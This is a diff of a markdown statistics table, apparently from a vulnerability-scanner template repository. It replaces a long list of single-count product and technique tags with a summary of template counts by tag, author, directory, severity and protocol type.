-| memcached | 1 | | | | | | | | |
-| festivo | 1 | | | | | | | | |
-| u8 | 1 | | | | | | | | |
-| mtheme | 1 | | | | | | | | |
-| console | 1 | | | | | | | | |
-| xds | 1 | | | | | | | | |
-| dribbble | 1 | | | | | | | | |
-| polarisft | 1 | | | | | | | | |
-| upnp | 1 | | | | | | | | |
-| h2 | 1 | | | | | | | | |
-| barracuda | 1 | | | | | | | | |
-| oam | 1 | | | | | | | | |
-| superset | 1 | | | | | | | | |
-| pagespeed | 1 | | | | | | | | |
-| perl | 1 | | | | | | | | |
-| semaphore | 1 | | | | | | | | |
-| mpsec | 1 | | | | | | | | |
-| gurock | 1 | | | | | | | | |
-| smartblog | 1 | | | | | | | | |
-| extreme | 1 | | | | | | | | |
-| scalar | 1 | | | | | | | | |
-| dwsync | 1 | | | | | | | | |
-| apigee | 1 | | | | | | | | |
-| calendly | 1 | | | | | | | | |
-| announcekit | 1 | | | | | | | | |
-| varnish | 1 | | | | | | | | |
-| quantum | 1 | | | | | | | | |
-| portainer | 1 | | | | | | | | |
-| caddy | 1 | | | | | | | | |
-| covalent | 1 | | | | | | | | |
-| boa | 1 | | | | | | | | |
-| roads | 1 | | | | | | | | |
-| kindeditor | 1 | | | | | | | | |
-| huijietong | 1 | | | | | | | | |
-| slstudio | 1 | | | | | | | | |
-| droneci | 1 | | | | | | | | |
-| concrete5 | 1 | | | | | | | | |
-| intellislot | 1 | | | | | | | | |
-| acemanager | 1 | | | | | | | | |
-| opensso | 1 | | | | | | | | |
-| admin | 1 | | | | | | | | |
-| clickhouse | 1 | | | | | | | | |
-| aniapi | 1 | | | | | | | | |
-| server | 1 | | | | | | | | |
-| geocode | 1 | | | | | | | | |
-| asana | 1 | | | | | | | | |
-| identityguard | 1 | | | | | | | | |
-| ymhome | 1 | | | | | | | | |
-| ioncube | 1 | | | | | | | | |
-| pastebin | 1 | | | | | | | | |
-| atvise | 1 | | | | | | | | |
-| lancom | 1 | | | | | | | | |
-| fortigates | 1 | | | | | | | | |
-| clansphere | 1 | | | | | | | | |
-| froxlor | 1 | | | | | | | | |
-| mongo-express | 1 | | | | | | | | |
-| amcrest | 1 | | | | | | | | |
-| trane | 1 | | | | | | | | |
-| babel | 1 | | | | | | | | |
-| lionwiki | 1 | | | | | | | | |
-| harvardart | 1 | | | | | | | | |
-| labtech | 1 | | | | | | | | |
-| comodo | 1 | | | | | | | | |
-| dasan | 1 | | | | | | | | |
-| redmine | 1 | | | | | | | | |
-| zoomsounds | 1 | | | | | | | | |
-| iucn | 1 | | | | | | | | |
-| nerdgraph | 1 | | | | | | | | |
-| neo4j | 1 | | | | | | | | |
-| cooperhewitt | 1 | | | | | | | | |
-| yishaadmin | 1 | | | | | | | | |
-| travis | 1 | | | | | | | | |
-| oliver | 1 | | | | | | | | |
-| web-dispatcher | 1 | | | | | | | | |
-| werkzeug | 1 | | | | | | | | |
-| vanguard | 1 | | | | | | | | |
-| pivotaltracker | 1 | | | | | | | | |
-| bing | 1 | | | | | | | | |
-| mastodon | 1 | | | | | | | | |
-| vision | 1 | | | | | | | | |
-| spotify | 1 | | | | | | | | |
-| zookeeper | 1 | | | | | | | | |
-| minimouse | 1 | | | | | | | | |
-| wavlink | 1 | | | | | | | | |
-| paneil | 1 | | | | | | | | |
-| submitty | 1 | | | | | | | | |
-| intelliflash | 1 | | | | | | | | |
-| onelogin | 1 | | | | | | | | |
-| gcp | 1 | | | | | | | | |
-| thecatapi | 1 | | | | | | | | |
-| moinmoin | 1 | | | | | | | | |
-| dreamweaver | 1 | | | | | | | | |
-| loganalyzer | 1 | | | | | | | | |
-| moonpay | 1 | | | | | | | | |
-| emby | 1 | | | | | | | | |
-| billquick | 1 | | | | | | | | |
-| improvmx | 1 | | | | | | | | |
-| dolphinscheduler | 1 | | | | | | | | |
-| tekon | 1 | | | | | | | | |
-| biometrics | 1 | | | | | | | | |
-| mozilla | 1 | | | | | | | | |
-| secnet | 1 | | | | | | | | |
-| raspap | 1 | | | | | | | | |
-| kramer | 1 | | | | | | | | |
-| kerio | 1 | | | | | | | | |
-| skywalking | 1 | | | | | | | | |
-| cloudron | 1 | | | | | | | | |
-| web3storage | 1 | | | | | | | | |
-| alchemy | 1 | | | | | | | | |
-| autocomplete | 1 | | | | | | | | |
-| rsa | 1 | | | | | | | | |
-| svnserve | 1 | | | | | | | | |
-| spiderfoot | 1 | | | | | | | | |
-| block | 1 | | | | | | | | |
-| taiga | 1 | | | | | | | | |
-| nuxeo | 1 | | | | | | | | |
-| lg-nas | 1 | | | | | | | | |
-| binance | 1 | | | | | | | | |
-| rdp | 1 | | | | | | | | |
-| noptin | 1 | | | | | | | | |
-| edgemax | 1 | | | | | | | | |
-| scs | 1 | | | | | | | | |
-| opnsense | 1 | | | | | | | | |
-| oscommerce | 1 | | | | | | | | |
-| find | 1 | | | | | | | | |
-| tcexam | 1 | | | | | | | | |
-| secmail | 1 | | | | | | | | |
-| ueditor | 1 | | | | | | | | |
-| bedita | 1 | | | | | | | | |
-| playable | 1 | | | | | | | | |
-| grails | 1 | | | | | | | | |
-| fortilogger | 1 | | | | | | | | |
-| gloo | 1 | | | | | | | | |
-| rhymix | 1 | | | | | | | | |
-| coinmarketcap | 1 | | | | | | | | |
-| geddy | 1 | | | | | | | | |
-| haproxy | 1 | | | | | | | | |
-| expose | 1 | | | | | | | | |
-| newsletter | 1 | | | | | | | | |
-| meshcentral | 1 | | | | | | | | |
-| krweb | 1 | | | | | | | | |
-| bigfix | 1 | | | | | | | | |
-| overflow | 1 | | | | | | | | |
-| kyocera | 1 | | | | | | | | |
-| xmpp | 1 | | | | | | | | |
-| codemeter | 1 | | | | | | | | |
-| catfishcms | 1 | | | | | | | | |
-| tieline | 1 | | | | | | | | |
-| adoptapet | 1 | | | | | | | | |
-| zzzphp | 1 | | | | | | | | |
-| distance | 1 | | | | | | | | |
-| leanix | 1 | | | | | | | | |
-| elevation | 1 | | | | | | | | |
-| dbt | 1 | | | | | | | | |
-| cse | 1 | | | | | | | | |
-| bonita | 1 | | | | | | | | |
-| novnc | 1 | | | | | | | | |
-| totolink | 1 | | | | | | | | |
-| gstorage | 1 | | | | | | | | |
-| radius | 1 | | | | | | | | |
-| emessage | 1 | | | | | | | | |
-| malwarebazaar | 1 | | | | | | | | |
-| europeana | 1 | | | | | | | | |
-| cscart | 1 | | | | | | | | |
-| jinfornet | 1 | | | | | | | | |
-| opensmtpd | 1 | | | | | | | | |
-| loqate | 1 | | | | | | | | |
-| sgp | 1 | | | | | | | | |
-| weboftrust | 1 | | | | | | | | |
-| opentsdb | 1 | | | | | | | | |
-| netmask | 1 | | | | | | | | |
-| prestahome | 1 | | | | | | | | |
-| chronoforums | 1 | | | | | | | | |
-| beanstalk | 1 | | | | | | | | |
-| netweaver | 1 | | | | | | | | |
-| blue-ocean | 1 | | | | | | | | |
-| b2evolution | 1 | | | | | | | | |
-| micro | 1 | | | | | | | | |
-| wago | 1 | | | | | | | | |
-| octobercms | 1 | | | | | | | | |
-| xml | 1 | | | | | | | | |
-| alquist | 1 | | | | | | | | |
-| jeewms | 1 | | | | | | | | |
-| mautic | 1 | | | | | | | | |
-| micro-user-service | 1 | | | | | | | | |
-| smi | 1 | | | | | | | | |
-| tinymce | 1 | | | | | | | | |
-| barco | 1 | | | | | | | | |
-| pan | 1 | | | | | | | | |
-| sponip | 1 | | | | | | | | |
-| projector | 1 | | | | | | | | |
-| cybrotech | 1 | | | | | | | | |
-| musicstore | 1 | | | | | | | | |
-| stytch | 1 | | | | | | | | |
-| weiphp | 1 | | | | | | | | |
-| cofax | 1 | | | | | | | | |
-| mkdocs | 1 | | | | | | | | |
-| goip | 1 | | | | | | | | |
-| pendo | 1 | | | | | | | | |
-| nordex | 1 | | | | | | | | |
-| mojoauth | 1 | | | | | | | | |
-| ubnt | 1 | | | | | | | | |
-| cve2000 | 1 | | | | | | | | |
-| sourcebans | 1 | | | | | | | | |
-| livehelperchat | 1 | | | | | | | | |
-| iceflow | 1 | | | | | | | | |
-| fastcgi | 1 | | | | | | | | |
-| idor | 1 | | | | | | | | |
-| buildkite | 1 | | | | | | | | |
-| dokuwiki | 1 | | | | | | | | |
-| expressjs | 1 | | | | | | | | |
-| admidio | 1 | | | | | | | | |
-| pyspider | 1 | | | | | | | | |
-| strider | 1 | | | | | | | | |
-| cryptocurrencies | 1 | | | | | | | | |
-| jenzabar | 1 | | | | | | | | |
-| webeditors | 1 | | | | | | | | |
-| bullwark | 1 | | | | | | | | |
-| aspnuke | 1 | | | | | | | | |
-| xamr | 1 | | | | | | | | |
-| wifisky | 1 | | | | | | | | |
-| browserless | 1 | | | | | | | | |
-| discord | 1 | | | | | | | | |
-| webctrl | 1 | | | | | | | | |
-| wix | 1 | | | | | | | | |
-| sceditor | 1 | | | | | | | | |
-| geoserver | 1 | | | | | | | | |
-| directions | 1 | | | | | | | | |
-| szhe | 1 | | | | | | | | |
-| phoronix | 1 | | | | | | | | |
-| vscode | 1 | | | | | | | | |
-| maccmsv10 | 1 | | | | | | | | |
-| lanproxy | 1 | | | | | | | | |
-| testrail | 1 | | | | | | | | |
-| supervisor | 1 | | | | | | | | |
-| dbeaver | 1 | | | | | | | | |
-| ocs-inventory | 1 | | | | | | | | |
-| chevereto | 1 | | | | | | | | |
-| cerebro | 1 | | | | | | | | |
-| ucs | 1 | | | | | | | | |
-| crm | 1 | | | | | | | | |
-| erp-nc | 1 | | | | | | | | |
-| drone | 1 | | | | | | | | |
-| uwsgi | 1 | | | | | | | | |
-| nette | 1 | | | | | | | | |
-| mdb | 1 | | | | | | | | |
-| blockchain | 1 | | | | | | | | |
-| logontracer | 1 | | | | | | | | |
-| etcd | 1 | | | | | | | | |
-| jabber | 1 | | | | | | | | |
-| karel | 1 | | | | | | | | |
-| camunda | 1 | | | | | | | | |
-| zuul | 1 | | | | | | | | |
-| etherscan | 1 | | | | | | | | |
-| avatier | 1 | | | | | | | | |
-| visionhub | 1 | | | | | | | | |
-| xdcms | 1 | | | | | | | | |
-| rmi | 1 | | | | | | | | |
-| coinapi | 1 | | | | | | | | |
-| piwigo | 1 | | | | | | | | |
-| bible | 1 | | | | | | | | |
-| suprema | 1 | | | | | | | | |
-| tika | 1 | | | | | | | | |
-| visualtools | 1 | | | | | | | | |
-| servicedesk | 1 | | | | | | | | |
-| zenphoto | 1 | | | | | | | | |
-| xproxy | 1 | | | | | | | | |
-| jupyterhub | 1 | | | | | | | | |
-| episerver | 1 | | | | | | | | |
-| streetview | 1 | | | | | | | | |
-| mrtg | 1 | | | | | | | | |
-| jaspersoft | 1 | | | | | | | | |
-| fortressaircraft | 1 | | | | | | | | |
-| bitcoinaverage | 1 | | | | | | | | |
-| placeos | 1 | | | | | | | | |
-| svn | 1 | | | | | | | | |
-| wiki | 1 | | | | | | | | |
-| fastapi | 1 | | | | | | | | |
-| pihole | 1 | | | | | | | | |
-| owa | 1 | | | | | | | | |
-| instagram | 1 | | | | | | | | |
-| gateone | 1 | | | | | | | | |
-| expn | 1 | | | | | | | | |
-| opm | 1 | | | | | | | | |
-| eprints | 1 | | | | | | | | |
-| yachtcontrol | 1 | | | | | | | | |
-| adiscon | 1 | | | | | | | | |
-| karma | 1 | | | | | | | | |
-| mirasys | 1 | | | | | | | | |
-| yongyou | 1 | | | | | | | | |
-| route | 1 | | | | | | | | |
-| virustotal | 1 | | | | | | | | |
-| axxonsoft | 1 | | | | | | | | |
-| securepoint | 1 | | | | | | | | |
-| hiawatha | 1 | | | | | | | | |
-| domino | 1 | | | | | | | | |
-| idemia | 1 | | | | | | | | |
-| shadoweb | 1 | | | | | | | | |
-| restler | 1 | | | | | | | | |
-| alerta | 1 | | | | | | | | |
-| interlib | 1 | | | | | | | | |
-| aims | 1 | | | | | | | | |
-| shoretel | 1 | | | | | | | | |
-| emlog | 1 | | | | | | | | |
-| cassandra | 1 | | | | | | | | |
-| librenms | 1 | | | | | | | | |
-| richfaces | 1 | | | | | | | | |
-| timeclock | 1 | | | | | | | | |
-| mara | 1 | | | | | | | | |
-| dvdFab | 1 | | | | | | | | |
-| synapse | 1 | | | | | | | | |
-| abuseipdb | 1 | | | | | | | | |
-| cve2021wordpress | 1 | | | | | | | | |
-| burp | 1 | | | | | | | | |
-| urlscan | 1 | | | | | | | | |
-| faust | 1 | | | | | | | | |
-| discourse | 1 | | | | | | | | |
-| clearbit | 1 | | | | | | | | |
-| anchorcms | 1 | | | | | | | | |
-| eyoumail | 1 | | | | | | | | |
-| nedi | 1 | | | | | | | | |
-| osquery | 1 | | | | | | | | |
-| ninjaform | 1 | | | | | | | | |
-| cloudera | 1 | | | | | | | | |
-| deviantart | 1 | | | | | | | | |
-| petfinder | 1 | | | | | | | | |
-| rijksmuseum | 1 | | | | | | | | |
-| xoops | 1 | | | | | | | | |
-| tugboat | 1 | | | | | | | | |
-| graylog | 1 | | | | | | | | |
-| secnet-ac | 1 | | | | | | | | |
-| redcap | 1 | | | | | | | | |
-| spf | 1 | | | | | | | | |
-| majordomo2 | 1 | | | | | | | | |
-| accuweather | 1 | | | | | | | | |
-| ecshop | 1 | | | | | | | | |
-| tufin | 1 | | | | | | | | |
-| rsyncd | 1 | | | | | | | | |
-| opencast | 1 | | | | | | | | |
-| thedogapi | 1 | | | | | | | | |
-| locations | 1 | | | | | | | | |
-| version | 1 | | | | | | | | |
-| cliniccases | 1 | | | | | | | | |
-| natemail | 1 | | | | | | | | |
-| 74cms | 1 | | | | | | | | |
-| emc | 1 | | | | | | | | |
-| webex | 1 | | | | | | | | |
-| fcm | 1 | | | | | | | | |
-| ganglia | 1 | | | | | | | | |
-| geolocation | 1 | | | | | | | | |
-| openx | 1 | | | | | | | | |
-| achecker | 1 | | | | | | | | |
-| foss | 1 | | | | | | | | |
-| zend | 1 | | | | | | | | |
-| primetek | 1 | | | | | | | | |
-| accent | 1 | | | | | | | | |
-| kronos | 1 | | | | | | | | |
-| ruoyi | 1 | | | | | | | | |
-| myvuehelp | 1 | | | | | | | | |
-| launchdarkly | 1 | | | | | | | | |
-| rainloop | 1 | | | | | | | | |
-| twig | 1 | | | | | | | | |
-| saml | 1 | | | | | | | | |
-| ns | 1 | | | | | | | | |
-| pagerduty | 1 | | | | | | | | |
-| sls | 1 | | | | | | | | |
-| parentlink | 1 | | | | | | | | |
-| leostream | 1 | | | | | | | | |
-| ucp | 1 | | | | | | | | |
-| lacie | 1 | | | | | | | | |
-| netrc | 1 | | | | | | | | |
-| pyramid | 1 | | | | | | | | |
-| fedora | 1 | | | | | | | | |
-| wildfly | 1 | | | | | | | | |
-| gocron | 1 | | | | | | | | |
-| spinnaker | 1 | | | | | | | | |
-| daybyday | 1 | | | | | | | | |
-| mailboxvalidator | 1 | | | | | | | | |
-| fms | 1 | | | | | | | | |
-| ntopng | 1 | | | | | | | | |
-| shopizer | 1 | | | | | | | | |
-| open-redirect | 1 | | | | | | | | |
-| k8 | 1 | | | | | | | | |
-| cors | 1 | | | | | | | | |
-| jnoj | 1 | | | | | | | | |
-| contactform | 1 | | | | | | | | |
-| crestron | 1 | | | | | | | | |
-| zenario | 1 | | | | | | | | |
-| opengear | 1 | | | | | | | | |
-| AlphaWeb | 1 | | | | | | | | |
-| processwire | 1 | | | | | | | | |
-| springframework | 1 | | | | | | | | |
-| cx | 1 | | | | | | | | |
-| webftp | 1 | | | | | | | | |
-| ewebs | 1 | | | | | | | | |
-| landrayoa | 1 | | | | | | | | |
-| whmcs | 1 | | | | | | | | |
-| racksnet | 1 | | | | | | | | |
-| kodi | 1 | | | | | | | | |
-| hetzner | 1 | | | | | | | | |
-| zipkin | 1 | | | | | | | | |
-| phalcon | 1 | | | | | | | | |
-| scanii | 1 | | | | | | | | |
-| piluscart | 1 | | | | | | | | |
-| cve2002 | 1 | | | | | | | | |
-| dnn | 1 | | | | | | | | |
-| graphiql | 1 | | | | | | | | |
-| office365 | 1 | | | | | | | | |
-| email | 1 | | | | | | | | |
-| commvault | 1 | | | | | | | | |
-| wdja | 1 | | | | | | | | |
-| hdnetwork | 1 | | | | | | | | |
-| groupoffice | 1 | | | | | | | | |
-| gsm | 1 | | | | | | | | |
-| finereport | 1 | | | | | | | | |
-| msmtp | 1 | | | | | | | | |
-| privx | 1 | | | | | | | | |
-| zmanda | 1 | | | | | | | | |
-| getgrav | 1 | | | | | | | | |
-| gunicorn | 1 | | | | | | | | |
-| sucuri | 1 | | | | | | | | |
-| floc | 1 | | | | | | | | |
-| vsphere | 1 | | | | | | | | |
-| redhat | 1 | | | | | | | | |
-| learnpress | 1 | | | | | | | | |
-| phabricator | 1 | | | | | | | | |
-| jwt | 1 | | | | | | | | |
-| klog | 1 | | | | | | | | |
-| caseaware | 1 | | | | | | | | |
-| guppy | 1 | | | | | | | | |
-| myucms | 1 | | | | | | | | |
-| turbocrm | 1 | | | | | | | | |
-| cherokee | 1 | | | | | | | | |
-| tinypng | 1 | | | | | | | | |
-| securenvoy | 1 | | | | | | | | |
-| alltube | 1 | | | | | | | | |
-| csod | 1 | | | | | | | | |
-| dotclear | 1 | | | | | | | | |
-| dss | 1 | | | | | | | | |
-| viewlinc | 1 | | | | | | | | |
-| socomec | 1 | | | | | | | | |
-| wondercms | 1 | | | | | | | | |
-| casemanager | 1 | | | | | | | | |
-| glowroot | 1 | | | | | | | | |
-| ricoh | 1 | | | | | | | | |
-| allied | 1 | | | | | | | | |
-| twitter-server | 1 | | | | | | | | |
-| adminset | 1 | | | | | | | | |
-| wakatime | 1 | | | | | | | | |
-| jreport | 1 | | | | | | | | |
-| lenovo | 1 | | | | | | | | |
-| iterable | 1 | | | | | | | | |
-| quip | 1 | | | | | | | | |
-| teradici | 1 | | | | | | | | |
-| sourcecodester | 1 | | | | | | | | |
-| jenkin | 1 | | | | | | | | |
-| postgres | 1 | | | | | | | | |
-| remkon | 1 | | | | | | | | |
-| cgit | 1 | | | | | | | | |
-| shiro | 1 | | | | | | | | |
-| hue | 1 | | | | | | | | |
-| opensns | 1 | | | | | | | | |
-| etherpad | 1 | | | | | | | | |
-| razor | 1 | | | | | | | | |
-| viaware | 1 | | | | | | | | |
-| phpfastcache | 1 | | | | | | | | |
-| raspberrymatic | 1 | | | | | | | | |
-| powercreator | 1 | | | | | | | | |
-| buildbot | 1 | | | | | | | | |
-| ddownload | 1 | | | | | | | | |
-| argocd | 1 | | | | | | | | |
-| xunchi | 1 | | | | | | | | |
-| calendarix | 1 | | | | | | | | |
-| jspxcms | 1 | | | | | | | | |
-| h5s | 1 | | | | | | | | |
-| pulsesecure | 1 | | | | | | | | |
-| eyou | 1 | | | | | | | | |
-| qualcomm | 1 | | | | | | | | |
-| lumis | 1 | | | | | | | | |
-| limit | 1 | | | | | | | | |
-| phpfusion | 1 | | | | | | | | |
-| smuggling | 1 | | | | | | | | |
-| bitquery | 1 | | | | | | | | |
-| eibiz | 1 | | | | | | | | |
-| timesheet | 1 | | | | | | | | |
-| adb | 1 | | | | | | | | |
-| mapbox | 1 | | | | | | | | |
-| nexusdb | 1 | | | | | | | | |
-| directadmin | 1 | | | | | | | | |
-| huemagic | 1 | | | | | | | | |
-| asanhamayesh | 1 | | | | | | | | |
-| prismaweb | 1 | | | | | | | | |
-| gilacms | 1 | | | | | | | | |
-| meraki | 1 | | | | | | | | |
-| optimizely | 1 | | | | | | | | |
-| gofile | 1 | | | | | | | | |
-| eyoucms | 1 | | | | | | | | |
-| salesforce | 1 | | | | | | | | |
-| biostar2 | 1 | | | | | | | | |
-| mariadb | 1 | | | | | | | | |
-| ilo4 | 1 | | | | | | | | |
-| mantis | 1 | | | | | | | | |
-| zcms | 1 | | | | | | | | |
-| hanming | 1 | | | | | | | | |
-| timezone | 1 | | | | | | | | |
-| coinranking | 1 | | | | | | | | |
-| kubeflow | 1 | | | | | | | | |
-| web-suite | 1 | | | | | | | | |
-| simplecrm | 1 | | | | | | | | |
-| vercel | 1 | | | | | | | | |
-| gemweb | 1 | | | | | | | | |
-| yarn | 1 | | | | | | | | |
-| planon | 1 | | | | | | | | |
-| opencart | 1 | | | | | | | | |
-| trilithic | 1 | | | | | | | | |
-| okta | 1 | | | | | | | | |
-| acme | 1 | | | | | | | | |
-| loytec | 1 | | | | | | | | |
-| honeypot | 1 | | | | | | | | |
-| plc | 1 | | | | | | | | |
-| nifi | 1 | | | | | | | | |
-| kyan | 1 | | | | | | | | |
-| nutanix | 1 | | | | | | | | |
-| chinaunicom | 1 | | | | | | | | |
-| mongoshake | 1 | | | | | | | | |
-| fanwei | 1 | | | | | | | | |
-| telecom | 1 | | | | | | | | |
-| rujjie | 1 | | | | | | | | |
-| kodexplorer | 1 | | | | | | | | |
-| thinkserver | 1 | | | | | | | | |
-| istat | 1 | | | | | | | | |
-| veeam | 1 | | | | | | | | |
-| clave | 1 | | | | | | | | |
-| gsoap | 1 | | | | | | | | |
-| lfw | 1 | | | | | | | | |
-| lutron | 1 | | | | | | | | |
-| place | 1 | | | | | | | | |
-| landray | 1 | | | | | | | | |
-| csrfguard | 1 | | | | | | | | |
-| easyappointments | 1 | | | | | | | | |
-| zarafa | 1 | | | | | | | | |
-| tectuus | 1 | | | | | | | | |
-| wallix | 1 | | | | | | | | |
-| satellian | 1 | | | | | | | | |
-| mofi | 1 | | | | | | | | |
-| pinata | 1 | | | | | | | | |
-| cve2001 | 1 | | | | | | | | |
-| hortonworks | 1 | | | | | | | | |
-| sterling | 1 | | | | | | | | |
-| txt | 1 | | | | | | | | |
-| h5sconsole | 1 | | | | | | | | |
-| etouch | 1 | | | | | | | | |
-| qsan | 1 | | | | | | | | |
-| zeppelin | 1 | | | | | | | | |
-| ssi | 1 | | | | | | | | |
-| ulterius | 1 | | | | | | | | |
-| pippoint | 1 | | | | | | | | |
-| phpwiki | 1 | | | | | | | | |
-| goanywhere | 1 | | | | | | | | |
-| stridercd | 1 | | | | | | | | |
-| pmb | 1 | | | | | | | | |
-| express | 1 | | | | | | | | |
-| couchcms | 1 | | | | | | | | |
-| sassy | 1 | | | | | | | | |
-| qizhi | 1 | | | | | | | | |
-| contentkeeper | 1 | | | | | | | | |
-| yaws | 1 | | | | | | | | |
-| memory-pipes | 1 | | | | | | | | |
-| intellect | 1 | | | | | | | | |
-| netgenie | 1 | | | | | | | | |
-| gridx | 1 | | | | | | | | |
-| pollbot | 1 | | | | | | | | |
-| acontent | 1 | | | | | | | | |
-| basic-auth | 1 | | | | | | | | |
-| apiman | 1 | | | | | | | | |
-| epm | 1 | | | | | | | | |
-| tink | 1 | | | | | | | | |
-| visualstudio | 1 | | | | | | | | |
-| phpunit | 1 | | | | | | | | |
-| spip | 1 | | | | | | | | |
-| nps | 1 | | | | | | | | |
-| hiboss | 1 | | | | | | | | |
-| dropbox | 1 | | | | | | | | |
-| myanimelist | 1 | | | | | | | | |
-| synnefo | 1 | | | | | | | | |
-| sar2html | 1 | | | | | | | | |
-| esxi | 1 | | | | | | | | |
-| xiuno | 1 | | | | | | | | |
-| workresources | 1 | | | | | | | | |
-| stem | 1 | | | | | | | | |
-| faraday | 1 | | | | | | | | |
-| addpac | 1 | | | | | | | | |
-| oidc | 1 | | | | | | | | |
-| shopxo | 1 | | | | | | | | |
-| ncomputing | 1 | | | | | | | | |
-| icinga | 1 | | | | | | | | |
-| apple | 1 | | | | | | | | |
-| keenetic | 1 | | | | | | | | |
-| darkstat | 1 | | | | | | | | |
-| zentral | 1 | | | | | | | | |
-| sonarcloud | 1 | | | | | | | | |
-| omi | 1 | | | | | | | | |
-| blueiris | 1 | | | | | | | | |
-| fastly | 1 | | | | | | | | |
-| saltapi | 1 | | | | | | | | |
-| dompdf | 1 | | | | | | | | |
-| postmark | 1 | | | | | | | | |
-| newrelic | 1 | | | | | | | | |
-| snipeit | 1 | | | | | | | | |
-| flexbe | 1 | | | | | | | | |
-| eyesofnetwork | 1 | | | | | | | | |
-| mdm | 1 | | | | | | | | |
-| slocum | 1 | | | | | | | | |
-| delta | 1 | | | | | | | | |
-| tor | 1 | | | | | | | | |
-| thinkadmin | 1 | | | | | | | | |
-| box | 1 | | | | | | | | |
-| strava | 1 | | | | | | | | |
-| details | 1 | | | | | | | | |
-| formalms | 1 | | | | | | | | |
-| wmt | 1 | | | | | | | | |
-| xmlchart | 1 | | | | | | | | |
-| opensearch | 1 | | | | | | | | |
-| trello | 1 | | | | | | | | |
-| mx | 1 | | | | | | | | |
-| h3c | 1 | | | | | | | | |
-| iconfinder | 1 | | | | | | | | |
-| cname | 1 | | | | | | | | |
-| sofneta | 1 | | | | | | | | |
-| starttls | 1 | | | | | | | | |
-| asus | 1 | | | | | | | | |
-| franklinfueling | 1 | | | | | | | | |
-| exponentcms | 1 | | | | | | | | |
-| nweb2fax | 1 | | | | | | | | |
-| superwebmailer | 1 | | | | | | | | |
-| alertmanager | 1 | | | | | | | | |
-| wowza | 1 | | | | | | | | |
-| revslider | 1 | | | | | | | | |
-| sage | 1 | | | | | | | | |
-| tamronos | 1 | | | | | | | | |
-| lotuscms | 1 | | | | | | | | |
-| siteomat | 1 | | | | | | | | |
-| issabel | 1 | | | | | | | | |
-| tuxedo | 1 | | | | | | | | |
-| solarlog | 1 | | | | | | | | |
-| smartsense | 1 | | | | | | | | |
-| zoneminder | 1 | | | | | | | | |
-| b2bbuilder | 1 | | | | | | | | |
-| ssltls | 1 | | | | | | | | |
-| dahua | 1 | | | | | | | | |
-| pods | 1 | | | | | | | | |
-| concourse | 1 | | | | | | | | |
-| smartsheet | 1 | | | | | | | | |
-| workspace | 1 | | | | | | | | |
-| softaculous | 1 | | | | | | | | |
-| biqsdrive | 1 | | | | | | | | |
-| particle | 1 | | | | | | | | |
-| argussurveillance | 1 | | | | | | | | |
-| checkmarx | 1 | | | | | | | | |
-| holidayapi | 1 | | | | | | | | |
-| fleet | 1 | | | | | | | | |
-| cve2004 | 1 | | | | | | | | |
-| knowage | 1 | | | | | | | | |
-| sunflower | 1 | | | | | | | | |
-| clockwatch | 1 | | | | | | | | |
-| arl | 1 | | | | | | | | |
-| speed | 1 | | | | | | | | |
-| ignition | 1 | | | | | | | | |
-| feedwordpress | 1 | | | | | | | | |
-| appweb | 1 | | | | | | | | |
-| incapptic-connect | 1 | | | | | | | | |
-| shopware | 1 | | | | | | | | |
-| aerohive | 1 | | | | | | | | |
-| doh | 1 | | | | | | | | |
-| commscope | 1 | | | | | | | | |
-| apcu | 1 | | | | | | | | |
-| fhem | 1 | | | | | | | | |
-| ecsimagingpacs | 1 | | | | | | | | |
-| nimble | 1 | | | | | | | | |
-| nomad | 1 | | | | | | | | |
-| edgeos | 1 | | | | | | | | |
-| malshare | 1 | | | | | | | | |
-| oauth2 | 1 | | | | | | | | |
-| qdpm | 1 | | | | | | | | |
-| mediumish | 1 | | | | | | | | |
-| flask | 1 | | | | | | | | |
-| siemens | 1 | | | | | | | | |
-| unisharp | 1 | | | | | | | | |
-| dicoogle | 1 | | | | | | | | |
-| kvm | 1 | | | | | | | | |
-| ncbi | 1 | | | | | | | | |
-| nc2 | 1 | | | | | | | | |
-| adafruit | 1 | | | | | | | | |
-| ebird | 1 | | | | | | | | |
-| purestorage | 1 | | | | | | | | |
-| bookstack | 1 | | | | | | | | |
-| idera | 1 | | | | | | | | |
-| wing-ftp | 1 | | | | | | | | |
-| eyelock | 1 | | | | | | | | |
-| ldap | 1 | | | | | | | | |
-| struts2 | 1 | | | | | | | | |
-| tarantella | 1 | | | | | | | | |
-| fiori | 1 | | | | | | | | |
-| luftguitar | 1 | | | | | | | | |
-| optiLink | 1 | | | | | | | | |
-| sast | 1 | | | | | | | | |
-| htmli | 1 | | | | | | | | |
-| dvr | 1 | | | | | | | | |
-| bazarr | 1 | | | | | | | | |
-| sitefinity | 1 | | | | | | | | |
-| formcraft3 | 1 | | | | | | | | |
-| webmodule-ee | 1 | | | | | | | | |
-| api-manager | 1 | | | | | | | | |
-| spectracom | 1 | | | | | | | | |
-| webui | 1 | | | | | | | | |
-| short.io | 1 | | | | | | | | |
-| coinlayer | 1 | | | | | | | | |
-| mappress | 1 | | | | | | | | |
-| roundcube | 1 | | | | | | | | |
-| blockfrost | 1 | | | | | | | | |
-| rudloff | 1 | | | | | | | | |
-| dotnet | 1 | | | | | | | | |
-| ecosys | 1 | | | | | | | | |
-| yopass | 1 | | | | | | | | |
-| ecom | 1 | | | | | | | | |
-| nearby | 1 | | | | | | | | |
-| threatq | 1 | | | | | | | | |
-| sprintful | 1 | | | | | | | | |
-| acsoft | 1 | | | | | | | | |
-| wazuh | 1 | | | | | | | | |
-| centreon | 1 | | | | | | | | |
-| portal | 1 | | | | | | | | |
-| imap | 1 | | | | | | | | |
-| wordcloud | 1 | | | | | | | | |
-| aura | 1 | | | | | | | | |
-| blackboard | 1 | | | | | | | | |
-| okiko | 1 | | | | | | | | |
+| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
+|----------------------|-------|-------------------------------------|-------|------------------|-------|----------|-------|---------|-------|
+| cve | 1430 | daffainfo | 631 | cves | 1407 | info | 1474 | http | 3858 |
+| panel | 655 | dhiyaneshdk | 584 | exposed-panels | 662 | high | 1009 | file | 76 |
+| edb | 563 | pikpikcu | 329 | vulnerabilities | 509 | medium | 818 | network | 51 |
+| lfi | 509 | pdteam | 269 | technologies | 282 | critical | 478 | dns | 17 |
+| xss | 491 | geeknik | 187 | exposures | 275 | low | 225 | | |
+| wordpress | 419 | dwisiswant0 | 169 | misconfiguration | 237 | unknown | 11 | | |
+| exposure | 407 | 0x_akoko | 165 | token-spray | 230 | | | | |
+| cve2021 | 352 | princechaddha | 151 | workflows | 189 | | | | |
+| rce | 337 | ritikchaddha | 137 | default-logins | 103 | | | | |
